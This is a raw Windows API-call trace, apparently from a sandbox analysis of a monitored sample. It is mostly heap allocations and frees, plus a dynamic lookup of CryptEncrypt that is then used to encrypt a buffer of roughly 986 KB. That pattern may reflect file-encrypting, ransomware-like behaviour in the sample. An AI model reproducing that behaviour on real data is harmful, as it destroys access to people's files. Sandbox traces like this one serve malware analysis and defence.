HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0178.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0178.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0178.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0178.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0178.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x40ee020 [0178.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x40ee020 | out: hHeap=0x970000) returned 1 [0178.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0178.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0178.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0178.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0178.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0178.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0178.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0178.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0178.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0178.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0178.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0178.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0178.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0178.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0178.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0178.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0178.879] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0178.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0178.879] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf0c00, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf0c08) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0178.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0178.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0178.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0178.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0178.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0178.883] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0178.883] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0178.883] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0178.884] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0178.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0178.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0178.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0178.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0178.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0178.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0178.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0178.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0178.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0178.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0178.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0178.885] CharLowerBuffW (in: lpsz="byte[986120]", cchLength=0xc | out: lpsz="byte[986120]") returned 0xc [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0178.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0178.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 